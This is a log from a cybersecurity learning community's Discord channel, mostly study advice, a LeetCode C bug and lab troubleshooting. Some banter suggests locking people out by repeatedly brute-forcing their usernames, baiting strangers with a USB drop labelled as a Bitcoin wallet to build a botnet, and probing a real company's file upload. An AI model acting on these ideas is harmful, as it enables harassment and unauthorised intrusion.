#general

1 messages ยท Page 1806 of 1

dark wolf
sturdy sequoia
#

how are you hacking it?

dark wolf
#

I have a tiny saw

#

tiny hacksaw

dark wolf
sturdy sequoia
#

haha i love it

dark wolf
#

There was a disagreement with someone earlier, so I am just helping them learn a lesson

cedar charm
dark wolf
#

๐Ÿคฃ

sturdy sequoia
#

i hope its ethical hacking

dark wolf
#

I only ever mention hacking things that were done legally

#

As far as the other ones, they never happened or I wasn't even involved.

brazen crane
#

All my warhammer instincts are kicking in, are you about to comit heresy fellow techpriest?

dark wolf
#

I am not about to go into detail about how I plan on chopping up mr gobfloor but I can assure you that the pain suffered from such actions will in no way surpass the pain caused by this individual.

brazen crane
#

If you hack the necronomicon doesn't the doom slayer turn up?

dark wolf
#

Not when you have sworn loyalty to Satan and all of his minions.

dark wolf
#

you must verify captain to send pics

sharp citrusBOT
dark wolf
#

Also I can't promote you if you don't verify, not that I will yet, that remains to be seen

brazen crane
reef galleon
#

hello, im new to cybersecurity and in a lot of videos, they recommend to learn python, i do the path recommended by thm for starting but there is no python in it, should i do the python rooms also ? thanks

sturdy sequoia
dark wolf
#

python is a whole other course. there are courses on udemy and youtube

#

there are many things to learn in cyber, it takes years

#

but you start somewhere

#

learning some basic python would help

reef galleon
twin ridgeBOT
#

Gave +1 Rep to @dark wolf (current: #84 - 118)

serene ginkgo
#

What we cooking today chat?

sturdy sequoia
bitter helm
#

would you say just doing the penetration tester path enough for the pt1?

serene ginkgo
serene ginkgo
#

they recommend doing it before you take the pt1

#

i've completed all the paths, very informative and handy to know.

bitter helm
#

After doing it I feel like either my retainment of the rooms are not enough or soemthing is missing

#

:/

gritty fern
#

You can always redo them to see if you remember

bitter helm
#

If I can do them without problems, and still want to do prepare better

#

any websites or places

#

I can test my knowledge

twin chasm
#

People, I need some advice on how to secure my accounts since my accounts had been comprimised a while back now i just lost my PSN acc and I worry my bank details will get leaked

dark wolf
#

Use a password manager with random generated passwords, use 2 factor auth wherever you can.

#

Use a different password for every site.

twin chasm
#

alright, but I worry bout my psn acc not cuz of games but my payment details and stuff, The support team is useless and is doing nothing

dark wolf
#

I change the passwords to the 400+ accounts i have every 6 hours just to be safe

#

What do you do for a living?
Change my password

warm terrace
twin chasm
#

Mannn i suck at hacking

loud orbit
dark wolf
# loud orbit wtf

i had 100Gb of storage with 95% full.. after deleting emails with "forgot password" in it im at 2%

loud orbit
dark wolf
#

man im laughing

#

luckily im in mute on this work maintenance call

marsh lark
#

yoooooooooooo

narrow yew
#

Imagine if someone would do this in a smaller scale.
Move towards a passwordless state

#

I dont even know my T1/T0 passwords

dark wolf
#

you do not need to know somone's password to lock them out

narrow yew
#

no that is easy in an AD world

dark wolf
#

just the username. brute force it and they get locked out

#

then they freak and think someone is hacking them

narrow yew
#

sisi

dark wolf
#

so you wait a few weeks then do it again ... but randomly here and there

#

lol thats mean

narrow yew
#

Do that to colleuges

dark wolf
#

pure evil

narrow yew
#

I am evil

dark wolf
#

hahha good!

narrow yew
#

I use bitwarden and a Thales key

dark wolf
#

All one has to do is write 50BTCWALLET on a usb key

#

do you think someone will plug it in their home computer/

narrow yew
#

Oooh I need to look for that in the logs

#

I bet you someone have

dark wolf
#

Give a complicated set of instructions on the autorun program that ends up having them leave a cookie and tracker trail to many places

#

lol

narrow yew
#

I am just reporting people for naughty things on USBs, did not think to look for wallets

#

Initially I am looking for things not supposed to be saved

dark wolf
#

First you have to get someone to plug the usb in

#

and that is easy to do if you make them think its worth 5 mil

narrow yew
#

We have logs off all content on USBs...

#

If I see something in logs I just ask them to plug it in, they will listen ๐Ÿ™‚

dark wolf
#

what do you mean

#

you mean in dmesg from a linux system when a usb is plugged in?

narrow yew
#

We have two seperate convos, saves time

dark wolf
#

got it

narrow yew
#

you are talking about one individual

#

I am talking about work

dark wolf
#

right

#

im talking about strangers

narrow yew
#

I don't know strangers

#

They be scary ๐Ÿ˜„

dark wolf
#

you need a bunch of strangers to build up your bot net

#

you just drop the usb disk somewhere in aparking lot

#

next to a NICE car

#

and maybe they pick it up

narrow yew
#

And realize they have a macbook air

#

and no USB

#

@dark wolf Is it late for you?

dark wolf
#

10pm

#

almost done with maintenace call

#

patching stuff

#

stupid breaches

narrow yew
#

you usually don't talk about doing botnets, kids might get the wrong idea here

#

Sounds like my work

dark wolf
#

I mean, I'm just spitballing theory here

#

You have to know how hackers operate to stop them

#

If you copy them you are going to be in a place where you do not want to drop the soap

narrow yew
#

I see botnet infected androids every now and then in the reports

dark wolf
#

There could be tons we don't know about

narrow yew
#

Just imagine the crap prople download from github and run

dark wolf
#

i have an iphone ๐Ÿ™‚

#

im gonn play some vr poker and bet 10x the bb on every hand LOL

#

peace

marsh lark
#

this room is private, so we can't help you with it

#

ask the room creator for help ๐Ÿ™‚

lone sierra
#

what a beautiful day

#

to sit on my chair, write some code

#

and realise how much i hate myself

rapid gust
#

hello kings and queens

#

how is everyone tonight

woven brook
#

Does the black Friday discount apply on top of the student 20%?

marsh lark
rapid gust
#

hi @marsh lark

orchid mesa
#

Hi

topaz sedge
modern fox
#

mornin yall

lone sierra
#

no, generally i love my self

#

i think the world would be a better place if people were like me

#

except when i am coding

rapid merlin
lone sierra
#

i am foscused on my task

#

do not get distracted for long time

#

take care of cleaniness

#

exercise

#

almost no smoking

#

drinking happens once in a while

#

always learning new things

modern fox
#

so everyone in this server who has mage+

rapid merlin
#

i am foucsed on my tasks and take care of cleanliness excercise and i am not smoking and not drinking and always learning new things

lone sierra
#

and a few things which i wouldn't want people to copy, can't say here

modern fox
#

basically

lone sierra
#

friendly

lone sierra
rapid merlin
lone sierra
#

ok nvm

#

lets skip this topic now

rapid merlin
lone sierra
#

lets make this small and yet so big world of ours a better place together

rapid merlin
lone sierra
#

no worries, i had already rejected ๐Ÿ˜

rapid merlin
lone sierra
#

right now?

rapid merlin
lone sierra
#

i was trying to convert my python written code to C lang

#

the code is aobut todays leetcode problem

marsh lark
lone sierra
#
    int count = 0;
    while (s[count] != '\0') {
        count++;
    }
    count--;

    while (count != 2) {
        for (int i = 0; i < count -1; i++) {
            s[i] = ((s[i])  + s[i+1]) %10;
        }
        count--;
    }

    return (s[0] == s[1]);
}```its almost done
lone sierra
marsh lark
lone sierra
#

right now, i am unable to convert the char to int

#

for the operation to be successful, rest all is done

rapid merlin
#

just a sec

marsh lark
lone sierra
#

@marsh lark you have any idea?

marsh lark
#

change the char* to a string (or just have it as a string originally)

lone sierra
#

i tried doing:
s[i] - '0'

marsh lark
#

that would only change the digit into an integer

#

there is a complicated way of doing it

#

but the simpliest way is:

#

string S(whatever_var_name_char*_is)

lone sierra
#

ohh i understood what i am doing wrong

marsh lark
#

int number = stoi(S)

lone sierra
#

because my code would make the string something like:
int/str/str/str

rapid merlin
lone sierra
#

which is not good

rapid merlin
#

but it will only work while printing

rapid merlin
lone sierra
lone sierra
#

and then use it at that time

marsh lark
rapid merlin
#

first remember that there is no string in c if you want to make a string then make the character string

#

yes send the problem we will help you

rapid merlin
lone sierra
#

i am writing code in C right now

marsh lark
marsh lark
lone sierra
#

max length is 100, what if only 4 elements?

#

actually i dont know what is s.size()

lone sierra
sleek hare
#

Gm

lone sierra
#

GM

marsh lark
rapid merlin
lone sierra
#

bruv

#

i didn't touch ai yet

#

for this question

rapid merlin
lone sierra
#

literally i just like to write code like this

sleek hare
#

I used AI for frontend etc

#

AI does not write like that

lone sierra
#

i'd love to justify myself for this one

#

if you look at spaces such as for() {}
the space between for() and {}

#

leetcode doesn't automatically put that

#

but i like that space, so i put it myself everytime

#

anyways, moving on to the solution

marsh lark
#

ngl, if you look at my code, you'll say, "thats 100% not AI"

sleek hare
#

They always put that space

#

Same to me, I'd never skip it

lone sierra
#

yea

sleek hare
#

Readability matters

#

Tbh now started to realise

#

That my RareScript (programming language I'm making) got syntax more like of C than JS ๐Ÿ’”

lone sierra
#

code might be shit, if it looks good, you can always correct it

#

wow, you're making your own langauge

sleek hare
sleek hare
lone sierra
#

same

sleek hare
#

It works

#

But single file only

#

I never finished multifile support

lone sierra
#

i plan to do compiler design this winter, maybe then i can also write my own language

sleek hare
#

The reason I can't really do that

#

Cuz I'm new in rust

lone sierra
#

oh so you play rust

sleek hare
#

And I have no idea how to make modules etc in my language without compiling them into rust

lone sierra
#

๐Ÿ˜

sleek hare
lone sierra
#

@marsh lark we can do count = strlen(s)

sleek hare
#

Compilable to assembly or executable

#

And supports running without compiling

#

(forgot how its named ๐Ÿ’” )

#

Issue is

#

It sometimes got different result

serene ginkgo
#

what we cooking today chat?

sleek hare
#

One thing might work on non compiled version

#

While on compiled it might not work cuz me forgot to add that thing

rapid merlin
sleek hare
#

Or just cuz it refuses to work for no reason

lone sierra
lone sierra
serene ginkgo
rapid merlin
sleek hare
#

Omg-

#

Its so quiet in my room

#

After I moved my server to the hall

serene ginkgo
sleek hare
#

Hall is loud now

serene ginkgo
#

the quieter it is, the more you able to hear..

sleek hare
#

My mom will be frustrated

#

My room is quiet

serene ginkgo
#

..

sleek hare
#

And no sound of fans

lone sierra
rapid merlin
lone sierra
#

yea, add 2983 as a test case

#

the answer should be true for that

sleek hare
#

I'm person who loves peace

#

But yes my neighbours are loud bruh

lone sierra
#

i like to stay alone in silence
but if not doing something productive it gets melancholy

rapid merlin
sleek hare
#

Cuz nobody can hurt you

#

Well they could but realistically no

lone sierra
rapid merlin
lone sierra
timid prism
#

Sleeping is amazing

lone sierra
timid prism
#

Specially in winter

lone sierra
#

it is good but only limited time

#

i dont like to sleep when i am bored or when i have nothing to do/bored

timid prism
#

11-630

lone sierra
#

i sleep around 6-7 hours, no fixed time though

timid prism
#

Cant achieve that

#

I hv fixed

#

If i dont sleep at 11 the next day is.... waste

rapid merlin
#

i also sleep 6-7 hours but not any fix time that when to sleep and when to not

lone sierra
#

@rapid merlin ```bool hasSameDigits(char* s) {
int count = strlen(s);
int arr[100] = {0};

for (int i = 0; i < count; i++){
    arr[i] = s[i] - '0';
}

while (count > 2) {
    for (int i = 0; i < count -1; i++) {
        arr[i] = (arr[i]  + arr[i+1]) %10;
    }
    count--;
}

return (arr[0] == arr[1]);

}```done

#

althought it takes 3ms ๐Ÿ˜ญ

rapid merlin
lone sierra
#

bro

#

you say you tried so much

#

but you left it before me

#

so it wasn't that much after all

rapid merlin
#

yes i left it before you but now i got there again and it solved

lone sierra
#

okok

rapid merlin
lone sierra
#

oh, not at all

rapid merlin
lone sierra
#

there are so many things i dont know and keep forgetting

lone sierra
rapid merlin
#

btw if you don't mind can i ask one question

lone sierra
#

ok

rapid merlin
#

so can i ask

rapid merlin
lone sierra
#

yes

#

asia

rapid merlin
# lone sierra asia

in asia where are you from i asked about country not about continent so funny

lone sierra
#

china

rapid merlin
#

be friends

lone sierra
#

its alright

rapid merlin
lone sierra
#

where are you from

rapid merlin
#

russia

lone sierra
#

oh ruski

#

i am learning russian

#

to speak

#

in counter strike

rapid merlin
#

btw i am not fully russian i moved to russia years ago and i also don't know fully russian i can write but cant speak

rapid merlin
lone sierra
#

ok

#

i guess

rapid merlin
lone sierra
#

๐Ÿ˜ญ

carmine fox
#

Does anyone know how you interact with the "TryModerateMe" to make a message to moderators to report spam?

rapid merlin
marsh lark
#

or
/report message

carmine fox
#

ok ok, I did that but it said I was not allowed to use that command

rapid merlin
sturdy sequoia
#

gotta make sure its not just the /report command. it needs user or message

marsh lark
ashen cape
#

Good morning everyone

marsh lark
#

mornin

ashen cape
#

How it's going?

marsh lark
ashen cape
#

Also good, have an appointment today

slow cloud
#

mornin

ashen cape
#

I don't want to go there as I will get questioned with dumb questions as always

#

๐Ÿ˜ฉ

ashen cape
whole rapids
#

did anyone try ghost of yotei?

coarse steppe
#

Guy's what generative AI model you use for hacking

marsh lark
#

but those are for small stuff

coarse steppe
#

Do you have pro / subscription

marsh lark
slow cloud
#

i use claude or gpt aswell

rapid merlin
coarse steppe
#

Actually one of my friend invited me for perplexity 1 year pro but don't know how to use cause it is same with more limit

slow cloud
#

i have pro on claude

marsh lark
coarse steppe
whole rapids
marsh lark
marsh lark
coarse steppe
#

Do you guys need invitation of perplexity ?

rapid merlin
slow cloud
#

i have never used perplexity

rapid merlin
rapid merlin
slow cloud
#

claude has become my goto

coarse steppe
#

Ok I have invitation link with 1 year pro

whole rapids
slow cloud
#

i had it generate 3d models

rapid merlin
marsh lark
slow cloud
#

and that worked like a charm

whole rapids
coarse steppe
marsh lark
#

that would probably be against the rules lol

rapid merlin
marsh lark
coarse steppe
#

Ok if someone wants let me know I will get referal bonus ๐Ÿ˜‚๐Ÿ˜

marsh lark
#

because gemini was better than chatgpt

twin ridgeBOT
#

Gave +1 Rep to @coarse steppe (current: #3229 - 1)

slow cloud
#

but you can ask one of the mods for permission to share it

marsh lark
marsh lark
coarse steppe
slow cloud
#

if you dont shoot you will always miss

marsh lark
rapid merlin
coarse steppe
#

Ok I will not send it

marsh lark
timid prism
rapid merlin
rapid merlin
marsh lark
timid prism
#

Clg gives gemini pro and copilot but i hvnt been able to use copilot as i dont use ms that much

timid prism
coarse steppe
white wharf
#

Okay

#

So I have a ctf in 3 days

#

Which is open book

#

So to get an idea where should I start?

slow cloud
#

What kind of CTF?

white wharf
#

Should I just go through picoctf walkthroughs and all to get an idea how to approach?

slow cloud
#

blue, red?

#

osint

white wharf
#

Also forensics and cryptography (which I'm familiar with)

slow cloud
#

then i would study those subjects i guess, the ctf's i participated in were just exercises pretty much

astral skiff
#

guys i need ur help

slow cloud
#

whatsup

astral skiff
#

i'm doing cybersecurity and computing forensics in uni and kinda lost in what to focus on for my carrier

#

i'm doing IR module in thm currently but have no idea what to start after it finishes

narrow yew
#

Yep

plush falcon
#

Wassup guys
How are you doing ?

sturdy sequoia
#

doing alright. u?

plush falcon
#

Doing okayish i guess ๐Ÿ˜…

fading perch
stoic quarry
#

Lmao

stuck river
#

Hello, I hope you're doing well. I have a small problem with the lateral movement rooms. It's been 3 days now that I've been trying to do them, but I canโ€™t connect to the network. Every time I try to ping the DC (THMDC), nothing happens. Iโ€™ve reset the network several times, but it still doesnโ€™t work. Iโ€™m using the AttackBox, by the way. Has anyone else had this problem before?

marsh lark
gusty inlet
#

That's what the message says so probably.

marsh lark
stuck river
#

Hey thank for your response. yes I am using the web-base attack box

marsh lark
severe cave
#

Hey at all ๐Ÿ™‚
Can anyone help me and recommend a good laptop for Linux?
I would be very happy about your support

slow cloud
#

linux can run on any laptop pretty much

#

what kind of things do u wanna do

#

gaming, programming

#

office work

#

vms

#

etc?

stuck river
#

yes i can't ping the network with the attack box.

marsh lark
stuck river
#

I start by pinging the DC like i said , nothing happend i have 100 lost.

marsh lark
stuck river
#

i actually did all they said but it's does'nt work. I can even ping and yet they say "If you are using the Web-based AttackBox, you will be connected to the network automatically if you start the AttackBox from the room's page. You can verify this by running the ping command against the IP of the THMDC.za.tryhackme.com"

marsh lark
#

and tried to ping (ip might be different for you):

stuck river
#

i do and try the nslookup command ... still doesn't work

marsh lark
#

nslookup won't work until you configure DNS, but for the ping problem, what is the exact command that you use?

stuck river
#

i do configure dns boss

marsh lark
#

could you send me the exact commands that you used to:

  1. ping the THMDC
  2. configure DNS
  3. do nslookup
stuck river
#

What I did: I started the network. Once it was up I started my AttackBox VM. Once started I tried to ping the THMDC address: ping 10.200.74.101 โ€” I got no reply. I retried several times but nothing. Then I ran this command:
sed -i '1s|^|nameserver 10.200.74.101\n|' /etc/resolv-dnsmasq
and I checked whether the command worked by looking at cat /etc/resolv-dnsmasq , the IP is present. I tried an nslookup but still nothing. I retried pings, still nothing, and this has been going on for 3 days. I have reset the AttackBox and the network several times.

marsh lark
stuck river
#

ok thank's

tender sedge
#

Hi chat, is there anyone here who has resources on individual CTF challenges?

slow cloud
#

which ctf challenge?

stoic quarry
#

What sort of CTF too

#

There's a few categories they usually fall into

chilly veldt
boreal scarab
#

It's National Slap Your Annoying Coworker Day!

velvet gull
#

shame I work remotely

#

when's the next national slap the end-user day? gotta go to the office for that one

sturdy sequoia
dark frost
#

What that ? Why you wanna talk to me tryhackme ๐Ÿ™„ , i done these rooms 1 year ago

calm moth
#

Looking for some good CTF teams or players to connect and make new friends โ€” DM if you're interested!

mossy river
#

God forbid a platform wants feedback to improve ๐Ÿ˜”

silver hornet
dark frost
#

If you pay me a coffee we can discuss about feedback โ˜•๏ธ

old canopy
old canopy
#

I still booked a feedback session

#

I fell for itโ€ฆ

dark frost
valid ravine
#

Hi

#

I'm freshman heee

#

Here*

sturdy sequoia
marsh lark
#

@mossy river @gusty inlet congrats on getting 10000 trophies on Clash Royale

#

One day, I shall walk in your footsteps

woven brook
#

Has jabba been alive for the last day?

marsh lark
woven brook
#

Hum

marsh lark
woven brook
#

Do you think he'd answer if I pinged him?

#

Ah lol

marsh lark
#

altho I wouldn't just test it out

#

he's busy'

woven brook
#

Sad

#

Where do I check the student discount thing then

marsh lark
woven brook
#

The thing is that says 5 months free but the discount is 3 months

#

When you go to pay you get 20% off

#

(less than 3 actually)

marsh lark
#

annual student discount is 20%

woven brook
#

I don't think a bug would raise the months free tag

#

Sounds like a very convenient and specific bug

marsh lark
barren heart
#

guys someone have same issue

#

??

marsh lark
woven brook
#

Also the pricing website is completely white for me when I access it through a phone, what's wrong with it

barren heart
#

i cant login into my acc

#

dude whole time

woven brook
#

Yes but the pricing site

#

And even if I use desktop view it just goes white

marsh lark
#

desktop view on your phone?

woven brook
#

Yes

marsh lark
#

still, it doesn't really work well on the phone, thats probably why

woven brook
woven brook
marsh lark
#

the 5 months could be

#

the cyber awareness discount

#

not the student discount

woven brook
#

Sounds like they added JavaScript to make the page blank on phone

marsh lark
#

could you /verify and send a screenshot?

sharp citrusBOT
woven brook
#

Yes let me get to my computer xd

marsh lark
woven brook
#

I want to believe it but I'm too skeptical to

marsh lark
#

they won't purposefully make it not work on mobile

#

its because the THM site isn't made for mobile

woven brook
#

Yes but it going all blank

#

ONLY in the pricing site

#

And it actually renders something

#

And then everything goes white

narrow yew
#

THM Emaling about having a chat about learning pahts was a new thing

sharp citrusBOT
narrow yew
#

They should see how good I am to book meetings with partners and vendors

#

I'm super good at forgetting to follow up with them as well

#

Strange email with a fully booked calendar where you can't even change month

woven brook
#

@marsh lark nevermind bruh it goes blank in desktop too

marsh lark
#

might be a one-time bug or smth

woven brook
#

yes, no luck

weary saddle
#

I just got the mail of the 15min chat from THM but no slot seems to be available

woven brook
#

this had been happening for a while btw

marsh lark
marsh lark
woven brook
#

ok now it works

#

cursed as it gets

weary saddle
#

But i'm curious what was the outcome of it , and if they sent that mail randomly for all

woven brook
#

5 months

narrow yew
#

Oh girl math again ๐Ÿ˜„

marsh lark
woven brook
#

what

narrow yew
#

It is a thing on reddit

weary saddle
#

Okay thanks for the quick response ๐Ÿ‘Œ

narrow yew
#

When the math for 12 months normal price vs discount price does not add up too 5 months free

woven brook
#

yes so whats the matter

#

its just fake advertising?

narrow yew
#

You posted the image, we did not mention it

marsh lark
#

no, its just some sort of math they kinda have, idk

woven brook
#

what kind of math is that

#

I'm very confused

narrow yew
#

Gyro, did you do the math?

#

Maybe there is a language issue here

marsh lark
marsh lark
narrow yew
#

See

#

whut whut

woven brook
#

you're making me doubt

narrow yew
#

I doubt the love

marsh lark
#

I've calculated it

#

it doesn't work

narrow yew
#

Me too

#

But if it says on internet people think its true

#

@woven brook If you are a student, its a good price

#

But ask yourself where the 5 months are

woven brook
#

okay I see the 5 months now

narrow yew
#

Will you get 17 months? Will you get the discount equivalent too 5 months?

woven brook
#

insane math they did there

#

anyway

marsh lark
#

its like

woven brook
#

how do they check if I'm a student?

woven brook
narrow yew
#

That is the check

woven brook
#

the check is that they do not check?

marsh lark
narrow yew
#

โœ… Are you student?

marsh lark
woven brook
#

serious

marsh lark
#

but they do check

woven brook
#

if i'm using my normal mail

narrow yew
#

I lost my EDU email, I need to buy a new one

woven brook
#

can I just tell them hey this is my student mail

narrow yew
#

Sure you can, there are tickets here

woven brook
#

tickets?

#

what kind of ticket is applied before purchase

narrow yew
#

You want too tell them you are a student?

woven brook
#

like, do I pay for the student thing and then AFTER they check?

#

yes

narrow yew
#

Pay in HK and save the VAT also

woven brook
#

pay in hollow knight

marsh lark
woven brook
#

I've been waiting for jabba to answer for 28 hours now

#

lmao hi jabba

mossy river
#

Set your occupation to Student in your profile

woven brook
#

how's tatooine

marsh lark
narrow yew
woven brook
narrow yew
#

That works for quite alot of signups

#

and password resets

mossy river
marsh lark
woven brook
#

so I dont have to be a student?

narrow yew
#

If you tell them you are, they trust you. This is a safe place

azure tinsel
#

I need job

mossy river
#

It was changed when the student discount was moved to only the yearly plan

woven brook
#

Crazy checks for a cybersec site

#

Hacker protection:
-If you use this site you agree to not hack, thanks

marsh lark
#

-# Imma be honest, I wish there were stricter checks lol, but it is what it is

narrow yew
#

Do you want Manual checks? Send in a copy of acceptance letter, video chat

#

Like githubs student checks

woven brook
#

yeah I was expecting the github stuff

#

anyway thanks for the help guys

marsh lark
dark wolf
#

There's a sign on the wall, but she wants to be sure.
Cause you know sometimes words have two meanings.

woven brook
#

is that a riddle?

dark wolf
#

In a tree by the brook, there's a songbird who sings

narrow yew
#

@dark wolf give her 5 dollars first and say nothing

dark wolf
#

Sometimes all o our thoughts are misgiven

narrow yew
#

You are cleaning at work again

#

Too much acetone

dark wolf
#

I'm disappointed in you Math

narrow yew
#

noo

dark wolf
#

Ohhh, it makes me wonder

#

Ohhhhhhhh, makes me wonder

#

There;s a feeling I get when I look to the West

stone iron
#

Hey, is there any problem with tryhackme right now. it seems i cant login. it goes to the 2FA page and coming back to the login page. anyone have the same ?

dark wolf
#

and my spirit is crying for leaving

narrow yew
silver hornet
stone iron
narrow yew
#

Ask it pretty please

dark wolf
#

In my thoughts I have seen rings of smoke through the trees

narrow yew
#

Someone asked about the same thing yesterday

dark wolf
#

And the voices of those who stand looking

narrow yew
#

Its up if you search 2FA

dark wolf
#

Still no Math?? What if I had started at the beginning

#

There's a lady who's sure all that glitters is gold ...

#

and she's buying a ...........

narrow yew
#

I am quite sure we do not listen to the same music

#

Stairway to heaaaven

dark wolf
#

BINGO

stiff oar
#

@keen flax Hello

#

@narrow yew Hello

narrow yew
#

Mamas mouse is not here

stiff oar
#

Nice to meet you.

#

is there anyone to collaborate with me?

#

@narrow yew
are you interested in me?

narrow yew
#

Well do you have any good books?

stiff oar
#

@narrow yew
No, I am looking for client to collaborate with me.

#

can you help me?

narrow yew
#

Client, sounds like you want payment

#

@dark wolf is pretty, he can pay

#

Or maybe its a she

#

who knows, its internet

marsh lark
dark wolf
#

Donut!!! Someone posted hello 21 hours ago on reddit and no one said hi back, aren't you reddit ambassador?

stiff oar
#

I mean someone to have work or project

#

@marsh lark
maybe founder

narrow yew
#

@dark wolf Send them here, I will ask how their day is daily and ask how they are doing

marsh lark
narrow yew
#

It is free to be kind, so asking how someones day is could a big thing

marsh lark
dark wolf
#

As an ambassador, youโ€™ll:

Share helpful insights in relevant subreddits,
Spark conversations around TryHackMe,
Help others discover useful resources and content,
narrow yew
#

I ask a bunch of friends and colleuge daily how their day was was or weekend.
If I don't ask nobody ask me back either.

But that is all good.

dark wolf
#

You don't have to disclose it, there is a post on it

marsh lark
dark wolf
marsh lark
dark wolf
#

You just said how you liked being helpful math

dark wolf
narrow yew
#

But I am glad to help users here prepare for interviews and map out the company

marsh lark
#

like could you send the link to the post where the person said hello and no one responded

narrow yew
#

But yesterday that backfired abit, Im glad I used torify

dark wolf
#

low effort post lol

marsh lark
dark wolf
#

oh damn

#

ok hahahh

sleek garnet
#

Are there any issues with authentication on the main site?

dark wolf
#

they probably deleted it after a few hours of no one responding and moved to tibet to become aa monk

marsh lark
#

best to email THM about it

sharp citrusBOT
#
TryHackMe's Email

TryHackMe's support email address.

dark wolf
#

Since AWS got hacked recently there have been issues

marsh lark
#

I keep forgetting that happened

#

youtube ad, why do you have to be so loud

dark wolf
#

Full disclosure: I don't know if they actually got hacked or what happened, but it's a lot more fun to just say they got hacked and if you say it enough people willl think it

marsh lark
#

don't make me go deaf

narrow yew
#

It was just AWS US 1?

narrow yew
#

That is why you monitor DNS urls and ISP urls and dispatchers, CDN etc

#

If they forget to pay, snatch it ๐Ÿ™‚

silver hornet
#

hello guys

dark wolf
#

Anyone else get an email asking for a 15 minute chat about their experience on THM?

narrow yew
#

Yes

#

I wanted to book and play Worms with the person

sleek garnet
twin ridgeBOT
#

Gave +1 Rep to @marsh lark (current: #28 - 401)

sleek garnet
marsh lark
#

what site doesn't want feedback

narrow yew
#

@marsh lark To bring the community together. I vote for worms tournament

sleek garnet
#

I get what they want... ๐Ÿ˜„

narrow yew
#

Everyone old loved Worms

marsh lark
#

there are a lot of young uns here

#

including myself

narrow yew
#

They need to learn about old games

dark wolf
#

Not many companies want to talk to their customers

sleek garnet
# marsh lark I mean, they want feedback

Like I can give feedback but chances are my requests won't be answered either in the 15 minutes or in te product for 6 - 12 months... if at all. so I come back to, "What is in it for me".

marsh lark
#

its 15 minutes of just feedback

#

oh I know

sleek garnet
marsh lark
#

you get better content

narrow yew
#

@sleek garnet First you need to give CVV2

#

then you get card

sleek garnet
dark wolf
#

Streak freeze

#

Interviewer: Thank you for taking the time to discuss with us what you thought about our PreSecurity Course. First question. How much experience do you have with IT before you started?
Me: Have you heard about our Lord and Saviour Jesus Christ?

marsh lark
calm briar
#

well hullo there

dark wolf
#

Good Morning Fomori

calm briar
#

General ๐Ÿซก

narrow yew
#

That gives you extra points with anybody

late dune
#

Guys how much should I pay to open all rooms of red team?

narrow yew
#

With bananas

marsh lark
late dune
calm briar
#

I know i'm harping on this a bit, but it's because i'm a little nervous about the last interview - but i'm not sure i know how to write up these scenerios. like he didn't ask for a write up - i was asked "to come in prepared to discuss " but i feel like having a little write up with a color matrix maybe and remediation suggestions for each scenerio would be ok. i've abandoned the idea of running metasploitable3 to get screen grabs for a PoC because it isn't a fake pentest - i'm explain to clients why things are vulnerable and why they need to be patched/changed. so i figured more visuals than anything . matrices and graphics about information exchange

narrow yew
#

With the new Student discount it was 8 something?

marsh lark
marsh lark
#

on annual

late dune
#

It showed me 8 euro

marsh lark
marsh lark
narrow yew
late dune
#

Itโ€™s same lol

#

2 euro diff

marsh lark
#

are you a student?

late dune
marsh lark
#

yeah, thats why

#

student discount

#

20%

#

if you are not logged in, then it doesn't know you are a student and just shows normal price

#

8 euros is the discounted price for students on annual

late dune
#

Itโ€™s so cheap for the amount of information that tryhackme gives

rapid merlin
marsh lark
#

so, each year would be around 96 euros

calm briar
#

i should over the top it and make a powerpoint with music and animatation

late dune
calm briar
#

who gave me those matrices and explanaions yesterday?

marsh lark
narrow yew
marsh lark
#

that you are paying each year the same ammount if you paid 8 euros a month

#

so annually, it is 96 euros

#

around

dark wolf
# narrow yew nonon no music

not with mp3.... it should be a website not power point. website that has midi playing in the background with flashing jpgs that come on and off and marquee banner scroll texting.

marsh lark
#

since 8 * 12 is 96

narrow yew
#

Then it comes to presenting reasons to patch you list all CVES that are plausable,

List vulns and have critical on the to

late dune
marsh lark
#

96 is still very cheap tho lol

late dune
dark wolf
late dune
#

Iโ€™m good

flint rover
#

Is anyone facing trouble with logging in?

dark wolf
marsh lark
dark wolf
late dune
#

I think tryhackme woudl give me fundamentals of everything and Iโ€™ll learn from other platforms like YouTube then Iโ€™ll be good I think

calm briar
# narrow yew Tell me more what you have been tasked with and if/or you are just doing example...

well i mean * I * want to write it so i'd rather not give the details but its a list of 3 scenerios. 1 is an externa;l pentest debrief - explain how the attackers could exploit the services, what risks do the findings pose to the business, ask questions about the devices if necessary, recommend remediation - all pretty straight forward right. obviously ask questions about the devices first before you go into a whole spiel about they have to change it if its a necessary evil that needs patching or configuration change, etc.

#

but i just don't know the format inwhich to show the information

flint rover
narrow yew
dark wolf
#

Have you tried talking to GPT to get help with it?

marsh lark
dark wolf
#

You need to provide a lot more context

#

GPT could help with that

#

it knows what employeers want, we don't

calm briar
#

my winamp skins are fire

narrow yew
#

I am off for a while if you need to bounce ideas @calm briar send me DM. I will forget to read up the chat.

#

We can find some vulrns for the company maybe also ๐Ÿ˜„

calm briar
#

thanks dude

narrow yew
#

I accidently helped another member yesterday and found file upload on the company

calm briar
narrow yew
#

That is also good I guess if you have something setup with vulnhub or similar to show how metasploit works

calm briar
#

yeah i have metasploit3 vm on the ready

#

i mean that was the original idea is make a fake report with all the screen grabs and icons and etc

#

i was using sysreptor with the htb template which has all the legal jargon and whatever - and comes out to like a 27 page report

calm briar
#

dude i argue with him all the time. i had to change his voice

dark wolf
#

lol me too

#

its fun

calm briar
#

i use it to help with another drone/iot project i've been doing - and was at a road block and i really thought it was my level of knowledge of the subject (which is limited) so i argue in voice with chatgpt for almost an hour and then we worked out how to make the python work lol

#

my little Igor

maiden parcel
#

Hello

calm briar
#

it won't be done until after winter now. i'm not hanging outside to do the tests.

dark mason
#

I hate physics

rapid merlin
marsh lark
rapid merlin
rapid merlin
marsh lark
maiden parcel
timid prism
#

Physics is logical

late dune
#

Guys as I said Iโ€™m beginner would tryhackme and some YouTube vids be enough for me to understand a little bit of what it really means to be a pentester

calm briar
#

you let me know how it feels when you find out

#

Guys i'm gonna lock down and do the full PoC fake report for the next 3 hours and see where it gets me.

#

I'll holler

distant robin
#

I'm doing this and it's not that simple - Tomcat: CVE-2024-50379

worldly pollen
#

helllo women

marsh lark
tawdry crescent
#

hello, I an new here, what's the afk voice channel?

marsh lark
#

idk

tawdry crescent
#

so like casual voice chat and stuff?

marsh lark
#

that would be general

tawdry crescent
#

So it is just for nothing I guess, should I join general if I just wanna talk?

tawdry crescent
#

there is no one in general too ๐Ÿฅน

rapid merlin
dark mason
#

when u have a shit teacher

marsh lark
#

true

distant robin
tawdry crescent
#

Hello woman

#

๐Ÿ˜

distant robin
#

I'm in a room, struggling with a payload I need to execute lol

